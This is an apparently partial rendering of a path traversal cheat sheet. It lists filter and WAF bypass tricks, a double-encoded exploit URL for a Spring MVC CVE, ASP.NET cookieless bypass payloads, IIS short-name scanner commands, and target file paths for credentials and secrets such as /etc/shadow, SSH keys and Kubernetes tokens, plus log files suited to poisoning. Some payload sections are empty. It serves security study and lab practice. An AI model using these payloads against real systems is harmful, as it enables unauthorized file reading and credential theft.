Directory Traversal
Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.
Summary
Tools
Basic exploitation
We can use the .. characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.
16 bits Unicode encoding
UTF-8 Unicode encoding
Bypass "../" replaced by ""
Sometimes you encounter a WAF which remove the ../ characters from the strings, just duplicate them.
Bypass "../" with ";"
Double URL encoding
e.g: Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
UNC Bypass
An attacker can inject a Windows UNC share ('\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
NGINX/ALB Bypass
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
http://nginx-server/../../ will return a 400 bad request.
To bypass this behaviour just add forward slashes in front of the url:
http://nginx-server////////../../
ASP NET Cookieless Bypass
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
For example, a typical URL might be transformed from: http://example.com/page.aspx to something like: http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx. The value within (S(...)) is the Session ID.
| .NET Version | URI |
|---|---|
| V1.0, V1.1 | /(XXXXXXXX)/ |
| V2.0+ | /(S(XXXXXXXX))/ |
| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ |
| V2.0+ | ... |
We can use this behavior to bypass filtered URLs.
-
If your application is in the main folder
-
If your application is in a subfolder
| CVE | Payload |
|---|---|
| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx |
| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx |
| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ |
IIS Short Name
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
Java Bypass
Bypass Java's URL protocol
Path Traversal
Interesting Linux files
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db
Interesting Windows files
Always existing file in recent Windows machine. Ideal to test path traversal but nothing much interesting inside...
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
The following log files are controllable and can be included with an evil payload to achieve a command execution
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
Labs
- File path traversal, simple case
- File path traversal, traversal sequences blocked with absolute path bypass
- File path traversal, traversal sequences stripped non-recursively
- File path traversal, traversal sequences stripped with superfluous URL-decode
- File path traversal, validation of start of path
- File path traversal, validation of file extension with null byte bypass
References
- Path Traversal Cheat Sheet: Windows
- Directory traversal attack - Wikipedia
- CWE-40: Path Traversal: '\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018
- NGINX may be protecting your applications from traversal attacks without you even knowing
- Directory traversal - Portswigger
- Cookieless ASPNET - Soroush Dalili
- EP 057 | Proc filesystem tricks & locatedb abuse with @remsio & @_bluesheet - TheLaluka - 30 nov. 2023
- Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011